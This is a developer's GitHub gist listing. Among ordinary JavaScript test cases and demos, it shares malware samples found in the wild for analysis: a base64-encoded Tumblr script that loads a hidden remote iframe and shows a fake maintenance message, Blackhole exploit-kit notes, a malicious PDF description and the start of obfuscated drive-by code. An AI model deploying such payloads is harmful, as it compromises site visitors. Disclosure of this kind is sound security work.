Skip to content

Instantly share code, notes, and snippets.

@scottschiller
scottschiller / gist:4196142
Created Dec 3, 2012
Possible Tumblr exploit found in the wild, 12/03/2012
View gist:4196142
<div class="the-video hideflash"><script src="data:text/plain;base64,dmFyIGZyYW1la2lsbGVyID0gdHJ1ZTsNCg0Kd2luZG93Lm9ubG9hZCA9IGZ1bmN0aW9uKCl7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsYXBwZXInKS5zcmMgPSAiaHR0cDovL2kuaG9wZS55b3UuZ2V0LnN0cmFuZ2xlZC5uZXQiOw0KfQ0KDQp3aW5kb3cub25iZWZvcmV1bmxvYWQgPSBmdW5jdGlvbigpIHsgDQogIGlmKGZyYW1la2lsbGVyKSB7DQogICAgcmV0dXJuICJOb3RpY2U6IFR1bWJsciB3aWxsIGJlIHVuZGVyZ29pbmcgbWFpbnRlbmFuY2Ugb24gRGVjZW1iZXIgNHRoIDIwMTIgYXQgMDE6MDAgQU0gZm9yIHNldmVyYWwgaG91cnMuXG5cbiBXZSBjYW5ub3QgZm9yZWNhc3QgZm9yIGV4YWN0bHkgaG93IGxvbmcsIHVuZm9ydHVuYXRlbHkuXG4gV2UgYXBvbG9naXplIGZvciB0aGUgaW5jb252ZW5pZW5jZS5cblxuWW91IG1heSBub3cgZGlzbWlzcyB0aGlzIG1lc3NhZ2UgdmlhICdDYW5jZWwvU3RheSBvbiB0aGlzIHBhZ2UnLiBUaGFuayB5b3UuIjsgIC8vIGFueSBtZXNzYWdlIHRoYXQgaGVscHMgdXNlciB0byBtYWtlIGRlY2lzaW9uDQogIH0NCn07"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>
Decoded:
/*
var framekiller = true;
window.onload = function(){
document.getElementById('lapper').src = "http://i.hope.you.get.st
@scottschiller
scottschiller / malware.js
Created Nov 15, 2012
"Blackhole" Flash + Adobe PDF Reader + Java/getJavaInfo.jar web exploit found in the wild, 11/15/2012
View malware.js
/**
* Looks as though this thing scans for vulnerable versions of Flash, Adobe PDF Reader and Java plugins.
* Oddly, the functions j1/j2/p1/p2/f1/f2 (which would presumably do the dirty work) are empty.
* It's worth noting that the hosting (bad) page says "Please wait, you will be forwarded / IE and Firefox-compatible only".
* Allegedly this is part of the "Blackhole Exploit Kit".
* Related details / video etc.:
* http://malwaremustdie.blogspot.com/2012/09/important-blackhole-exploit-kit-starts.html
* http://malware.dontneedcoffee.com/2012/09/BHEK2.0landing.html
*/
View gist:2890589
<!-- Flickr is made of, by and for humans: Here are 17 signs of empathy in the form of loading messages. ;) -->
Reticulating splines...
Frobulating widgets...
Engaging Tuna Blaster...
Firing up the engines...
Buffering...
Herding pandas...
Questioning the Magic Donkey...
Your machine is learning our ways
@scottschiller
scottschiller / yui3-loader-test.html
Created May 8, 2012
YUI 3.5.1 loader test (IE 9, quirks mode DTD)
View yui3-loader-test.html
<!--
Lack of DTD means quirks mode in IE 9, and YUI 3.5.1 will fail to load module dependencies due to <script>.onload not being supported. <script>.onreadystatechange should instead be used when document.documentMode < 9, which means IE 9 rendering a page in quirks mode, IE 7 or IE 8 standards mode.
-->
<html>
<head>
<script src="http://yui.yahooapis.com/3.5.1/build/yui/yui-min.js"></script>
<script>
// Create a YUI sandbox on your page.
YUI().use('node', 'event', function (Y) {
// The Node and Event modules are loaded and ready to use.
@scottschiller
scottschiller / gist:2623390
Created May 6, 2012 — forked from spadgos/gist:2561726
Recreating a SoundManager bug / fixed testcase
View gist:2623390
<html>
<head>
<!--
report URL: https://getsatisfaction.com/schillmania/topics/sound_playing_double
related SM2 fix/commit: https://github.com/scottschiller/SoundManager2/commit/013565dbb5abfc5bf0ab66b0246352ee3ca5cc02
-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Soundmanager test</title>
<!-- you'll have to correct the paths to SoundManager to get it working for yourself -->
<script>window.SM2_DEFER = true;</script>
@scottschiller
scottschiller / gist:2142215
Created Mar 20, 2012
JavaScript PDF exploit found in the wild, 03/20/2012
View gist:2142215
I got this PDF as an email attachment.
The PDF file included a JavaScript block defining an array, and some encoded (for example, &#123;) character entries underneath defining the function responsible for decoding and running it.
The interesting part of the PDF where the script started:
<test:script contentType='&#97;&#0112;plication/&#120;-javascript'>
That was followed by the array data (not encoded), and then this block:
@scottschiller
scottschiller / malware.html
Created Feb 28, 2012
Browser malware found in the wild, 02/28/2012
View malware.html
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
@scottschiller
scottschiller / gist:1187837
Created Sep 2, 2011
Closure compiler "INTERNAL COMPILER ERROR" with soundmanager2-nodebug.js (Compiler version 1346)
View gist:1187837
[ Report for Google Closure Compiler folks, internal compiler error on routinely-compressed JS ]
Source file used:
https://raw.github.com/scottschiller/SoundManager2/V2.97a.20110801+DEV/script/soundmanager2-nodebug.js
Reporting this per instructions in the compiler output.
For what it's worth, compilation has previously been successful until I updated the compiler to the build below.
This version of the compiler fails:
Closure Compiler (http://code.google.com/closure/compiler)
@scottschiller
scottschiller / js-ball-collision.html
Created Jul 10, 2011
A collision-enabled variant of my JavaScript Animation Demo #2, feature added at the request of a public school technology teacher who wrote in. (Teachers showing kids JavaScript in high school FTW! :P)
View js-ball-collision.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<style type="text/css">
body {
font:76% normal verdana,arial,tahoma;
}
@scottschiller
scottschiller / normalized-addremove.html
Created Sep 26, 2010
Somewhat-normalized event listener handling (DOM2)
View normalized-addremove.html
<html>
<head>
<title>Somewhat-normalized event add/remove</title>
<script>
var addEvent, removeEvent;
(function() {
/*
* Somewhat-normalized event add/remove (old IE/W3C)